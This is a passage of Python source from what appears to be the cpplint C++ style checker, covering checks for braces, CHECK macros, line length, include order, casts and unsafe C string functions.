prev_line = clean_lines.lines[linenum - 1]
if (not IsBlankLine(prev_line) and
not Search(r'\b(class|struct)\b', prev_line) and
not Search(r'\\$', prev_line)):
# Try a bit harder to find the beginning of the class. This is to
# account for multi-line base-specifier lists, e.g.:
# class Derived
# : public Base {
end_class_head = class_info.starting_linenum
for i in range(class_info.starting_linenum, linenum):
if Search(r'\{\s*$', clean_lines.lines[i]):
end_class_head = i
break
if end_class_head < linenum - 1:
error(filename, linenum, 'whitespace/blank_line', 3,
'"%s:" should be preceded by a blank line' % matched.group(1))
def GetPreviousNonBlankLine(clean_lines, linenum):
"""Return the most recent non-blank line and its line number.
Args:
clean_lines: A CleansedLines instance containing the file contents.
linenum: The number of the line to check.
Returns:
A tuple with two elements. The first element is the contents of the last
non-blank line before the current line, or the empty string if this is the
first non-blank line. The second is the line number of that line, or -1
if this is the first non-blank line.
"""
prevlinenum = linenum - 1
while prevlinenum >= 0:
prevline = clean_lines.elided[prevlinenum]
if not IsBlankLine(prevline): # if not a blank line...
return (prevline, prevlinenum)
prevlinenum -= 1
return ('', -1)
def CheckBraces(filename, clean_lines, linenum, error):
"""Looks for misplaced braces (e.g. at the end of line).
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum] # get rid of comments and strings
if Match(r'\s*{\s*$', line):
# We allow an open brace to start a line in the case where someone
# is using braces in a block to explicitly create a new scope,
# which is commonly used to control the lifetime of
# stack-allocated variables. We don't detect this perfectly: we
# just don't complain if the last non-whitespace character on the
# previous non-blank line is ';', ':', '{', or '}', or if the previous
# line starts a preprocessor block.
prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0]
if (not Search(r'[;:}{]\s*$', prevline) and
not Match(r'\s*#', prevline)):
error(filename, linenum, 'whitespace/braces', 4,
'{ should almost always be at the end of the previous line')
# An else clause should be on the same line as the preceding closing brace.
if Match(r'\s*else\s*', line):
prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0]
if Match(r'\s*}\s*$', prevline):
error(filename, linenum, 'whitespace/newline', 4,
'An else should appear on the same line as the preceding }')
# If braces come on one side of an else, they should be on both.
# However, we have to worry about "else if" that spans multiple lines!
if Search(r'}\s*else[^{]*$', line) or Match(r'[^}]*else\s*{', line):
if Search(r'}\s*else if([^{]*)$', line): # could be multi-line if
# find the ( after the if
pos = line.find('else if')
pos = line.find('(', pos)
if pos > 0:
(endline, _, endpos) = CloseExpression(clean_lines, linenum, pos)
if endline[endpos:].find('{') == -1: # must be brace after if
error(filename, linenum, 'readability/braces', 5,
'If an else has a brace on one side, it should have it on both')
else: # common case: else not followed by a multi-line if
error(filename, linenum, 'readability/braces', 5,
'If an else has a brace on one side, it should have it on both')
# Likewise, an else should never have the else clause on the same line
if Search(r'\belse [^\s{]', line) and not Search(r'\belse if\b', line):
error(filename, linenum, 'whitespace/newline', 4,
'Else clause should never be on same line as else (use 2 lines)')
# In the same way, a do/while should never be on one line
if Match(r'\s*do [^\s{]', line):
error(filename, linenum, 'whitespace/newline', 4,
'do/while clauses should not be on a single line')
# Braces shouldn't be followed by a ; unless they're defining a struct
# or initializing an array.
# We can't tell in general, but we can for some common cases.
prevlinenum = linenum
while True:
(prevline, prevlinenum) = GetPreviousNonBlankLine(clean_lines, prevlinenum)
if Match(r'\s+{.*}\s*;', line) and not prevline.count(';'):
line = prevline + line
else:
break
if (Search(r'{.*}\s*;', line) and
line.count('{') == line.count('}') and
not Search(r'struct|class|enum|\s*=\s*{', line)):
error(filename, linenum, 'readability/braces', 4,
"You don't need a ; after a }")
def CheckEmptyLoopBody(filename, clean_lines, linenum, error):
"""Loop for empty loop body with only a single semicolon.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Search for loop keywords at the beginning of the line. Because only
# whitespaces are allowed before the keywords, this will also ignore most
# do-while-loops, since those lines should start with closing brace.
line = clean_lines.elided[linenum]
if Match(r'\s*(for|while)\s*\(', line):
# Find the end of the conditional expression
(end_line, end_linenum, end_pos) = CloseExpression(
clean_lines, linenum, line.find('('))
# Output warning if what follows the condition expression is a semicolon.
# No warning for all other cases, including whitespace or newline, since we
# have a separate check for semicolons preceded by whitespace.
if end_pos >= 0 and Match(r';', end_line[end_pos:]):
error(filename, end_linenum, 'whitespace/empty_loop_body', 5,
'Empty loop bodies should use {} or continue')
def ReplaceableCheck(operator, macro, line):
"""Determine whether a basic CHECK can be replaced with a more specific one.
  For example, suggest using CHECK_EQ instead of CHECK(a == b) and
similarly for CHECK_GE, CHECK_GT, CHECK_LE, CHECK_LT, CHECK_NE.
Args:
operator: The C++ operator used in the CHECK.
macro: The CHECK or EXPECT macro being called.
line: The current source line.
Returns:
True if the CHECK can be replaced with a more specific one.
"""
# This matches decimal and hex integers, strings, and chars (in that order).
match_constant = r'([-+]?(\d+|0[xX][0-9a-fA-F]+)[lLuU]{0,3}|".*"|\'.*\')'
# Expression to match two sides of the operator with something that
# looks like a literal, since CHECK(x == iterator) won't compile.
# This means we can't catch all the cases where a more specific
# CHECK is possible, but it's less annoying than dealing with
# extraneous warnings.
match_this = (r'\s*' + macro + r'\((\s*' +
match_constant + r'\s*' + operator + r'[^<>].*|'
r'.*[^<>]' + operator + r'\s*' + match_constant +
r'\s*\))')
# Don't complain about CHECK(x == NULL) or similar because
# CHECK_EQ(x, NULL) won't compile (requires a cast).
# Also, don't complain about more complex boolean expressions
# involving && or || such as CHECK(a == b || c == d).
return Match(match_this, line) and not Search(r'NULL|&&|\|\|', line)
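To see what ReplaceableCheck accepts, the same regex construction can be rebuilt with plain `re` calls. `replaceable` here is a hypothetical stand-in for the function above, shown only to make the literal-on-one-side rule concrete:

```python
import re

# Same constant pattern as in ReplaceableCheck: decimal/hex integers,
# strings, and chars (in that order).
match_constant = r'([-+]?(\d+|0[xX][0-9a-fA-F]+)[lLuU]{0,3}|".*"|\'.*\')'

def replaceable(operator, macro, line):
    # Mirrors the match_this construction in ReplaceableCheck.
    match_this = (r'\s*' + macro + r'\((\s*' +
                  match_constant + r'\s*' + operator + r'[^<>].*|'
                  r'.*[^<>]' + operator + r'\s*' + match_constant +
                  r'\s*\))')
    return bool(re.match(match_this, line)) and not re.search(
        r'NULL|&&|\|\|', line)

assert replaceable('==', 'CHECK', 'CHECK(x == 42);')     # suggest CHECK_EQ
assert not replaceable('==', 'CHECK', 'CHECK(a == b);')  # no literal side
assert not replaceable('==', 'CHECK', 'CHECK(x == NULL);')  # needs a cast
```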
def CheckCheck(filename, clean_lines, linenum, error):
"""Checks the use of CHECK and EXPECT macros.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
# Decide the set of replacement macros that should be suggested
raw_lines = clean_lines.raw_lines
current_macro = ''
for macro in _CHECK_MACROS:
if raw_lines[linenum].find(macro) >= 0:
current_macro = macro
break
if not current_macro:
# Don't waste time here if line doesn't contain 'CHECK' or 'EXPECT'
return
line = clean_lines.elided[linenum] # get rid of comments and strings
# Encourage replacing plain CHECKs with CHECK_EQ/CHECK_NE/etc.
for operator in ['==', '!=', '>=', '>', '<=', '<']:
if ReplaceableCheck(operator, current_macro, line):
error(filename, linenum, 'readability/check', 2,
'Consider using %s instead of %s(a %s b)' % (
_CHECK_REPLACEMENT[current_macro][operator],
current_macro, operator))
break
def CheckAltTokens(filename, clean_lines, linenum, error):
"""Check alternative keywords being used in boolean expressions.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
error: The function to call with any errors found.
"""
line = clean_lines.elided[linenum]
# Avoid preprocessor lines
if Match(r'^\s*#', line):
return
# Last ditch effort to avoid multi-line comments. This will not help
# if the comment started before the current line or ended after the
# current line, but it catches most of the false positives. At least,
# it provides a way to workaround this warning for people who use
# multi-line comments in preprocessor macros.
#
# TODO(unknown): remove this once cpplint has better support for
# multi-line comments.
if line.find('/*') >= 0 or line.find('*/') >= 0:
return
for match in _ALT_TOKEN_REPLACEMENT_PATTERN.finditer(line):
error(filename, linenum, 'readability/alt_tokens', 2,
'Use operator %s instead of %s' % (
_ALT_TOKEN_REPLACEMENT[match.group(1)], match.group(1)))
def GetLineWidth(line):
"""Determines the width of the line in column positions.
Args:
line: A string, which may be a Unicode string.
Returns:
The width of the line in column positions, accounting for Unicode
combining characters and wide characters.
"""
if isinstance(line, unicode):
width = 0
for uc in unicodedata.normalize('NFC', line):
if unicodedata.east_asian_width(uc) in ('W', 'F'):
width += 2
elif not unicodedata.combining(uc):
width += 1
return width
else:
return len(line)
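GetLineWidth relies on the Python 2 `unicode` type; under Python 3, where every `str` is Unicode, the same width rule can be sketched as follows (a hypothetical port for illustration, not part of this module):

```python
import unicodedata

def line_width_py3(line):
    """Python 3 sketch of GetLineWidth: wide/fullwidth characters count
    as two columns, combining characters as zero, everything else as one."""
    width = 0
    for uc in unicodedata.normalize('NFC', line):
        if unicodedata.east_asian_width(uc) in ('W', 'F'):
            width += 2
        elif not unicodedata.combining(uc):
            width += 1
    return width

assert line_width_py3('abc') == 3
assert line_width_py3('\u4f60\u597d') == 4  # two CJK chars, two columns each
assert line_width_py3('e\u0301') == 1       # 'e' + combining accent -> one column
```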
def CheckStyle(filename, clean_lines, linenum, file_extension, nesting_state,
error):
"""Checks rules from the 'C++ style rules' section of cppguide.html.
Most of these rules are hard to test (naming, comment style), but we
do what we can. In particular we check for 2-space indents, line lengths,
tab usage, spaces inside code, etc.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
file_extension: The extension (without the dot) of the filename.
nesting_state: A _NestingState instance which maintains information about
the current stack of nested blocks being parsed.
error: The function to call with any errors found.
"""
raw_lines = clean_lines.raw_lines
line = raw_lines[linenum]
if line.find('\t') != -1:
error(filename, linenum, 'whitespace/tab', 1,
'Tab found; better to use spaces')
# One or three blank spaces at the beginning of the line is weird; it's
# hard to reconcile that with 2-space indents.
  # NOTE: here are the conditions Rob Pike used for his tests.  Mine aren't
# as sophisticated, but it may be worth becoming so: RLENGTH==initial_spaces
# if(RLENGTH > 20) complain = 0;
# if(match($0, " +(error|private|public|protected):")) complain = 0;
# if(match(prev, "&& *$")) complain = 0;
# if(match(prev, "\\|\\| *$")) complain = 0;
# if(match(prev, "[\",=><] *$")) complain = 0;
# if(match($0, " <<")) complain = 0;
# if(match(prev, " +for \\(")) complain = 0;
# if(prevodd && match(prevprev, " +for \\(")) complain = 0;
initial_spaces = 0
cleansed_line = clean_lines.elided[linenum]
while initial_spaces < len(line) and line[initial_spaces] == ' ':
initial_spaces += 1
if line and line[-1].isspace():
error(filename, linenum, 'whitespace/end_of_line', 4,
'Line ends in whitespace. Consider deleting these extra spaces.')
# There are certain situations we allow one space, notably for labels
elif ((initial_spaces == 1 or initial_spaces == 3) and
not Match(r'\s*\w+\s*:\s*$', cleansed_line)):
error(filename, linenum, 'whitespace/indent', 3,
'Weird number of spaces at line-start. '
'Are you using a 2-space indent?')
# Labels should always be indented at least one space.
elif not initial_spaces and line[:2] != '//' and Search(r'[^:]:\s*$',
line):
error(filename, linenum, 'whitespace/labels', 4,
'Labels should always be indented at least one space. '
'If this is a member-initializer list in a constructor or '
'the base class list in a class definition, the colon should '
'be on the following line.')
# Check if the line is a header guard.
is_header_guard = False
if file_extension == 'h':
cppvar = GetHeaderGuardCPPVariable(filename)
if (line.startswith('#ifndef %s' % cppvar) or
line.startswith('#define %s' % cppvar) or
line.startswith('#endif // %s' % cppvar)):
is_header_guard = True
# #include lines and header guards can be long, since there's no clean way to
# split them.
#
# URLs can be long too. It's possible to split these, but it makes them
# harder to cut&paste.
#
# The "$Id:...$" comment may also get very long without it being the
  # developer's fault.
if (not line.startswith('#include') and not is_header_guard and
not Match(r'^\s*//.*http(s?)://\S*$', line) and
not Match(r'^// \$Id:.*#[0-9]+ \$$', line)):
line_width = GetLineWidth(line)
if line_width > 100:
error(filename, linenum, 'whitespace/line_length', 4,
'Lines should very rarely be longer than 100 characters')
elif line_width > 80:
error(filename, linenum, 'whitespace/line_length', 2,
'Lines should be <= 80 characters long')
if (cleansed_line.count(';') > 1 and
# for loops are allowed two ;'s (and may run over two lines).
cleansed_line.find('for') == -1 and
(GetPreviousNonBlankLine(clean_lines, linenum)[0].find('for') == -1 or
GetPreviousNonBlankLine(clean_lines, linenum)[0].find(';') != -1) and
# It's ok to have many commands in a switch case that fits in 1 line
not ((cleansed_line.find('case ') != -1 or
cleansed_line.find('default:') != -1) and
cleansed_line.find('break;') != -1)):
error(filename, linenum, 'whitespace/newline', 0,
'More than one command on the same line')
# Some more style checks
CheckBraces(filename, clean_lines, linenum, error)
CheckEmptyLoopBody(filename, clean_lines, linenum, error)
CheckAccess(filename, clean_lines, linenum, nesting_state, error)
CheckSpacing(filename, clean_lines, linenum, nesting_state, error)
CheckCheck(filename, clean_lines, linenum, error)
CheckAltTokens(filename, clean_lines, linenum, error)
classinfo = nesting_state.InnermostClass()
if classinfo:
CheckSectionSpacing(filename, clean_lines, classinfo, linenum, error)
_RE_PATTERN_INCLUDE_NEW_STYLE = re.compile(r'#include +"[^/]+\.h"')
_RE_PATTERN_INCLUDE = re.compile(r'^\s*#\s*include\s*([<"])([^>"]*)[>"].*$')
# Matches the first component of a filename delimited by -s and _s. That is:
# _RE_FIRST_COMPONENT.match('foo').group(0) == 'foo'
# _RE_FIRST_COMPONENT.match('foo.cc').group(0) == 'foo'
# _RE_FIRST_COMPONENT.match('foo-bar_baz.cc').group(0) == 'foo'
# _RE_FIRST_COMPONENT.match('foo_bar-baz.cc').group(0) == 'foo'
_RE_FIRST_COMPONENT = re.compile(r'^[^-_.]+')
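The behaviour documented in the comments above can be exercised with a small standalone sketch (the `first_component` helper name is hypothetical; it simply mirrors `_RE_FIRST_COMPONENT`):

```python
import re

# Mirrors _RE_FIRST_COMPONENT above: everything before the first '-', '_' or '.'.
_FIRST_COMPONENT = re.compile(r'^[^-_.]+')

def first_component(name):
    # Return the leading filename component, or '' if the name starts
    # with a delimiter.
    match = _FIRST_COMPONENT.match(name)
    return match.group(0) if match else ''
```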
def _DropCommonSuffixes(filename):
"""Drops common suffixes like _test.cc or -inl.h from filename.
For example:
>>> _DropCommonSuffixes('foo/foo-inl.h')
'foo/foo'
>>> _DropCommonSuffixes('foo/bar/foo.cc')
'foo/bar/foo'
>>> _DropCommonSuffixes('foo/foo_internal.h')
'foo/foo'
>>> _DropCommonSuffixes('foo/foo_unusualinternal.h')
'foo/foo_unusualinternal'
Args:
filename: The input filename.
Returns:
The filename with the common suffix removed.
"""
for suffix in ('test.cc', 'regtest.cc', 'unittest.cc',
'inl.h', 'impl.h', 'internal.h'):
if (filename.endswith(suffix) and len(filename) > len(suffix) and
filename[-len(suffix) - 1] in ('-', '_')):
return filename[:-len(suffix) - 1]
return os.path.splitext(filename)[0]
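The suffix-stripping rule can be illustrated with a standalone sketch (a simplified re-implementation for illustration, not the function cpplint itself calls):

```python
import os

def drop_common_suffixes(filename):
    # Strip test/impl suffixes only when preceded by '-' or '_',
    # mirroring _DropCommonSuffixes above.
    for suffix in ('test.cc', 'regtest.cc', 'unittest.cc',
                   'inl.h', 'impl.h', 'internal.h'):
        if (filename.endswith(suffix) and len(filename) > len(suffix) and
                filename[-len(suffix) - 1] in ('-', '_')):
            return filename[:-len(suffix) - 1]
    # Otherwise just drop the extension.
    return os.path.splitext(filename)[0]
```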
def _IsTestFilename(filename):
"""Determines if the given filename has a suffix that identifies it as a test.
Args:
filename: The input filename.
Returns:
True if 'filename' looks like a test, False otherwise.
"""
if (filename.endswith('_test.cc') or
filename.endswith('_unittest.cc') or
filename.endswith('_regtest.cc')):
return True
else:
return False
def _ClassifyInclude(fileinfo, include, is_system):
"""Figures out what kind of header 'include' is.
Args:
fileinfo: The current file cpplint is running over. A FileInfo instance.
include: The path to a #included file.
is_system: True if the #include used <> rather than "".
Returns:
One of the _XXX_HEADER constants.
For example:
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'stdio.h', True)
_C_SYS_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'string', True)
_CPP_SYS_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/foo.h', False)
_LIKELY_MY_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo_unknown_extension.cc'),
... 'bar/foo_other_ext.h', False)
_POSSIBLE_MY_HEADER
>>> _ClassifyInclude(FileInfo('foo/foo.cc'), 'foo/bar.h', False)
_OTHER_HEADER
"""
# This is a list of all standard c++ header files, except
# those already checked for above.
is_stl_h = include in _STL_HEADERS
is_cpp_h = is_stl_h or include in _CPP_HEADERS
if is_system:
if is_cpp_h:
return _CPP_SYS_HEADER
else:
return _C_SYS_HEADER
# If the target file and the include we're checking share a
# basename when we drop common extensions, and the include
# lives in the same directory, then it's likely to be owned by the target file.
target_dir, target_base = (
os.path.split(_DropCommonSuffixes(fileinfo.RepositoryName())))
include_dir, include_base = os.path.split(_DropCommonSuffixes(include))
if target_base == include_base and (
include_dir == target_dir or
include_dir == os.path.normpath(target_dir + '/../public')):
return _LIKELY_MY_HEADER
# If the target and include share some initial basename
# component, it's possible the target is implementing the
# include, so it's allowed to be first, but we'll never
# complain if it's not there.
target_first_component = _RE_FIRST_COMPONENT.match(target_base)
include_first_component = _RE_FIRST_COMPONENT.match(include_base)
if (target_first_component and include_first_component and
target_first_component.group(0) ==
include_first_component.group(0)):
return _POSSIBLE_MY_HEADER
return _OTHER_HEADER
def CheckIncludeLine(filename, clean_lines, linenum, include_state, error):
"""Check rules that are applicable to #include lines.
Strings on #include lines are NOT removed from the elided line, to make
certain tasks easier. However, to prevent false positives, checks
applicable to #include lines in CheckLanguage must be put here.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
include_state: An _IncludeState instance in which the headers are inserted.
error: The function to call with any errors found.
"""
fileinfo = FileInfo(filename)
line = clean_lines.lines[linenum]
# "include" should use the new style "foo/bar.h" instead of just "bar.h"
if _RE_PATTERN_INCLUDE_NEW_STYLE.search(line):
error(filename, linenum, 'build/include', 4,
'Include the directory when naming .h files')
# We shouldn't include a file more than once. Actually, there are a
# handful of instances where doing so is okay, but in general it's
# not.
match = _RE_PATTERN_INCLUDE.search(line)
if match:
include = match.group(2)
is_system = (match.group(1) == '<')
if include in include_state:
error(filename, linenum, 'build/include', 4,
'"%s" already included at %s:%s' %
(include, filename, include_state[include]))
else:
include_state[include] = linenum
# We want to ensure that headers appear in the right order:
# 1) for foo.cc, foo.h (preferred location)
# 2) c system files
# 3) cpp system files
# 4) for foo.cc, foo.h (deprecated location)
# 5) other google headers
#
# We classify each include statement as one of those 5 types
# using a number of techniques. The include_state object keeps
# track of the highest type seen, and complains if we see a
# lower type after that.
error_message = include_state.CheckNextIncludeOrder(
_ClassifyInclude(fileinfo, include, is_system))
if error_message:
error(filename, linenum, 'build/include_order', 4,
'%s. Should be: %s.h, c system, c++ system, other.' %
(error_message, fileinfo.BaseName()))
if not include_state.IsInAlphabeticalOrder(include):
error(filename, linenum, 'build/include_alpha', 4,
'Include "%s" not in alphabetical order' % include)
# Look for any of the stream classes that are part of standard C++.
match = _RE_PATTERN_INCLUDE.match(line)
if match:
include = match.group(2)
if Match(r'(f|ind|io|i|o|parse|pf|stdio|str|)?stream$', include):
# Many unit tests use cout, so we exempt them.
if not _IsTestFilename(filename):
error(filename, linenum, 'readability/streams', 3,
'Streams are highly discouraged.')
def _GetTextInside(text, start_pattern):
"""Retrieves all the text between matching open and close parentheses.
Given a string of lines and a regular expression string, retrieve all the text
following the expression and between opening punctuation symbols like
(, [, or {, and the matching close-punctuation symbol. This properly handles
nested occurrences of the punctuation, so for text like
printf(a(), b(c()));
a call to _GetTextInside(text, r'printf\(') will return 'a(), b(c())'.
start_pattern must match a string that ends with an opening punctuation symbol.
Args:
text: The lines to extract text. Its comments and strings must be elided.
It can be a single line or span multiple lines.
start_pattern: The regexp string indicating where to start extracting
the text.
Returns:
The extracted text.
None if either the opening string or ending punctuation could not be found.
"""
# TODO(sugawarayu): Audit cpplint.py to see what places could be profitably
# rewritten to use _GetTextInside (and use inferior regexp matching today).
# Map each opening punctuation to its matching close-punctuation.
matching_punctuation = {'(': ')', '{': '}', '[': ']'}
closing_punctuation = set(matching_punctuation.itervalues())
# Find the position to start extracting text.
match = re.search(start_pattern, text, re.M)
if not match: # start_pattern not found in text.
return None
start_position = match.end(0)
assert start_position > 0, (
'start_pattern must end with an opening punctuation.')
assert text[start_position - 1] in matching_punctuation, (
'start_pattern must end with an opening punctuation.')
# Stack of closing punctuations we expect to have in text after position.
punctuation_stack = [matching_punctuation[text[start_position - 1]]]
position = start_position
while punctuation_stack and position < len(text):
if text[position] == punctuation_stack[-1]:
punctuation_stack.pop()
elif text[position] in closing_punctuation:
# A closing punctuation without matching opening punctuations.
return None
elif text[position] in matching_punctuation:
punctuation_stack.append(matching_punctuation[text[position]])
position += 1
if punctuation_stack:
# Opening punctuations left without matching close-punctuations.
return None
# punctuations match.
return text[start_position:position - 1]
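The balanced-punctuation walk above can be condensed into a self-contained sketch (a simplified re-implementation for illustration; `get_text_inside` is a hypothetical name, not the function cpplint exports):

```python
import re

def get_text_inside(text, start_pattern):
    # Extract the text between the opening punctuation at the end of
    # start_pattern's match and its balanced closing counterpart.
    matching = {'(': ')', '{': '}', '[': ']'}
    closing = set(matching.values())
    match = re.search(start_pattern, text, re.M)
    if not match:
        return None
    start = match.end(0)
    # Stack of closing punctuation we still expect to see.
    stack = [matching[text[start - 1]]]
    pos = start
    while stack and pos < len(text):
        if text[pos] == stack[-1]:
            stack.pop()
        elif text[pos] in closing:
            return None          # closing punctuation with no matching open
        elif text[pos] in matching:
            stack.append(matching[text[pos]])
        pos += 1
    if stack:
        return None              # opening punctuation left unclosed
    return text[start:pos - 1]
```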
def CheckLanguage(filename, clean_lines, linenum, file_extension, include_state,
error):
"""Checks rules from the 'C++ language rules' section of cppguide.html.
Some of these rules are hard to test (function overloading, using
uint32 inappropriately), but we do the best we can.
Args:
filename: The name of the current file.
clean_lines: A CleansedLines instance containing the file.
linenum: The number of the line to check.
file_extension: The extension (without the dot) of the filename.
include_state: An _IncludeState instance in which the headers are inserted.
error: The function to call with any errors found.
"""
# If the line is empty or consists of entirely a comment, no need to
# check it.
line = clean_lines.elided[linenum]
if not line:
return
match = _RE_PATTERN_INCLUDE.search(line)
if match:
CheckIncludeLine(filename, clean_lines, linenum, include_state, error)
return
# Create an extended_line, which is the concatenation of the current and
# next lines, for more effective checking of code that may span more than one
# line.
if linenum + 1 < clean_lines.NumLines():
extended_line = line + clean_lines.elided[linenum + 1]
else:
extended_line = line
# Make Windows paths like Unix.
fullname = os.path.abspath(filename).replace('\\', '/')
# TODO(unknown): figure out if they're using default arguments in fn proto.
# Check for non-const references in functions. This is tricky because &
# is also used to take the address of something. We allow <> for templates,
# (ignoring whatever is between the braces) and : for classes.
# These are complicated re's. They try to capture the following:
# paren (for fn-prototype start), typename, &, varname. For the const
# version, we allow 'const' to appear either before or after the typename.
# Don't check the implementation on the same line.
fnline = line.split('{', 1)[0]
if (len(re.findall(r'\([^()]*\b(?:[\w:]|<[^()]*>)+(\s?&|&\s?)\w+', fnline)) >
len(re.findall(r'\([^()]*\bconst\s+(?:typename\s+)?(?:struct\s+)?'
r'(?:[\w:]|<[^()]*>)+(\s?&|&\s?)\w+', fnline)) +
len(re.findall(r'\([^()]*\b(?:[\w:]|<[^()]*>)+\s+const(\s?&|&\s?)[\w]+',
fnline))):
# We allow non-const references in a few standard places, like functions
# called "swap()" or iostream operators like "<<" or ">>". We also filter
# out for loops, which lint otherwise mistakenly thinks are functions.
if not Search(
r'(for|swap|Swap|operator[<>][<>])\s*\(\s*'
r'(?:(?:typename\s*)?[\w:]|<.*>)+\s*&',
fnline):
error(filename, linenum, 'runtime/references', 2,
'Is this a non-const reference? '
'If so, make const or use a pointer.')
# Check to see if they're using a conversion function cast.
# I just try to capture the most common basic types, though there are more.
# Parameterless conversion functions, such as bool(), are allowed as they are
# probably a member operator declaration or default constructor.
match = Search(
r'(\bnew\s+)?\b' # Grab 'new' operator, if it's there
r'(int|float|double|bool|char|int32|uint32|int64|uint64)\([^)]', line)
if match:
# gMock methods are defined using some variant of MOCK_METHODx(name, type)
# where type may be float(), int(string), etc. Without context they are
# virtually indistinguishable from int(x) casts. Likewise, gMock's
# MockCallback takes a template parameter of the form return_type(arg_type),
# which looks much like the cast we're trying to detect.
if (match.group(1) is None and # If new operator, then this isn't a cast
not (Match(r'^\s*MOCK_(CONST_)?METHOD\d+(_T)?\(', line) or
Match(r'^\s*MockCallback<.*>', line))):
# Try a bit harder to catch gmock lines: the only place where
# something looks like an old-style cast is where we declare the
# return type of the mocked method, and the only time when we
# are missing context is if MOCK_METHOD was split across
# multiple lines (for example http://go/hrfhr ), so we only need
# to check the previous line for MOCK_METHOD.
if (linenum == 0 or
not Match(r'^\s*MOCK_(CONST_)?METHOD\d+(_T)?\(\S+,\s*$',
clean_lines.elided[linenum - 1])):
error(filename, linenum, 'readability/casting', 4,
'Using deprecated casting style. '
'Use static_cast<%s>(...) instead' %
match.group(2))
CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum],
'static_cast',
r'\((int|float|double|bool|char|u?int(16|32|64))\)', error)
# This doesn't catch all cases. Consider (const char * const)"hello".
#
# (char *) "foo" should always be a const_cast (reinterpret_cast won't
# compile).
if CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum],
'const_cast', r'\((char\s?\*+\s?)\)\s*"', error):
pass
else:
# Check pointer casts for other than string constants
CheckCStyleCast(filename, linenum, line, clean_lines.raw_lines[linenum],
'reinterpret_cast', r'\((\w+\s?\*+\s?)\)', error)
# In addition, we look for people taking the address of a cast. This
# is dangerous -- casts can assign to temporaries, so the pointer doesn't
# point where you think.
if Search(
r'(&\([^)]+\)[\w(])|(&(static|dynamic|reinterpret)_cast\b)', line):
error(filename, linenum, 'runtime/casting', 4,
('Are you taking an address of a cast? '
'This is dangerous: could be a temp var. '
'Take the address before doing the cast, rather than after'))
# Check for people declaring static/global STL strings at the top level.
# This is dangerous because the C++ language does not guarantee that
# globals with constructors are initialized before the first access.
match = Match(
r'((?:|static +)(?:|const +))string +([a-zA-Z0-9_:]+)\b(.*)',
line)
# Make sure it's not a function.
# Function template specialization looks like: "string foo<Type>(...".
# Class template definitions look like: "string Foo<Type>::Method(...".
if match and not Match(r'\s*(<.*>)?(::[a-zA-Z0-9_]+)?\s*\(([^"]|$)',
match.group(3)):
error(filename, linenum, 'runtime/string', 4,
'For a static/global string constant, use a C style string instead: '
'"%schar %s[]".' %
(match.group(1), match.group(2)))
# Check that we're not using RTTI outside of testing code.
if Search(r'\bdynamic_cast<', line) and not _IsTestFilename(filename):
error(filename, linenum, 'runtime/rtti', 5,
'Do not use dynamic_cast<>. If you need to cast within a class '
"hierarchy, use static_cast<> to upcast. Google doesn't support "
'RTTI.')
if Search(r'\b([A-Za-z0-9_]*_)\(\1\)', line):
error(filename, linenum, 'runtime/init', 4,
'You seem to be initializing a member variable with itself.')
if file_extension == 'h':
# TODO(unknown): check that 1-arg constructors are explicit.
# How to tell it's a constructor?
# (handled in CheckForNonStandardConstructs for now)
# TODO(unknown): check that classes have DISALLOW_EVIL_CONSTRUCTORS
# (level 1 error)
pass
# Check if people are using the verboten C basic types. The only exception
# we regularly allow is "unsigned short port" for port.
if Search(r'\bshort port\b', line):
if not Search(r'\bunsigned short port\b', line):
error(filename, linenum, 'runtime/int', 4,
'Use "unsigned short" for ports, not "short"')
else:
match = Search(r'\b(short|long(?! +double)|long long)\b', line)
if match:
error(filename, linenum, 'runtime/int', 4,
'Use int16/int64/etc, rather than the C type %s' % match.group(1))
# When snprintf is used, the second argument shouldn't be a literal.
match = Search(r'snprintf\s*\(([^,]*),\s*([0-9]*)\s*,', line)
if match and match.group(2) != '0':
# If 2nd arg is zero, snprintf is used to calculate size.
error(filename, linenum, 'runtime/printf', 3,
'If you can, use sizeof(%s) instead of %s as the 2nd arg '
'to snprintf.' % (match.group(1), match.group(2)))
# Check if some verboten C functions are being used.
if Search(r'\bsprintf\b', line):
error(filename, linenum, 'runtime/printf', 5,
'Never use sprintf. Use snprintf instead.')
match = Search(r'\b(strcpy|strcat)\b', line)
if match:
error(filename, linenum, 'runtime/printf', 4,
'Almost always, snprintf is better than %s' % match.group(1))
if Search(r'\bsscanf\b', line):
error(filename, linenum, 'runtime/printf', 1,
'sscanf can be ok, but is slow and can overflow buffers.')
# Check if some verboten operator overloading is going on
# TODO(unknown): catch out-of-line unary operator&:
# class X {};
# int operator&(const X& x) { return 42; } // unary operator&
# The trick is it's hard to tell apart from binary operator&:
# class Y { int operator&(const Y& x) { return 23; } }; // binary operator&
if Search(r'\boperator\s*&\s*\(\s*\)', line):
error(filename, linenum, 'runtime/operator', 4,
'Unary operator& is dangerous. Do not use it.')
# Check for suspicious usage of "if" like
# } if (a == b) {
if Search(r'\}\s*if\s*\(', line):
error(filename, linenum, 'readability/braces', 4,
'Did you mean "else if"? If not, start a new line for "if".')
# Check for potential format string bugs like printf(foo).
# We constrain the pattern not to pick things like DocidForPrintf(foo).
# Not perfect but it can catch printf(foo.c_str()) and printf(foo->c_str())
# TODO(sugawarayu): Catch the following case. Need to change the calling
# convention of the whole function to process multiple line to handle it.
# printf(
# boy_this_is_a_really_long_variable_that_cannot_fit_on_the_prev_line);
printf_args = _GetTextInside(line, r'(?i)\b(string)?printf\s*\(')
if printf_args:
match = Match(r'([\w.\->()]+)$', printf_args)
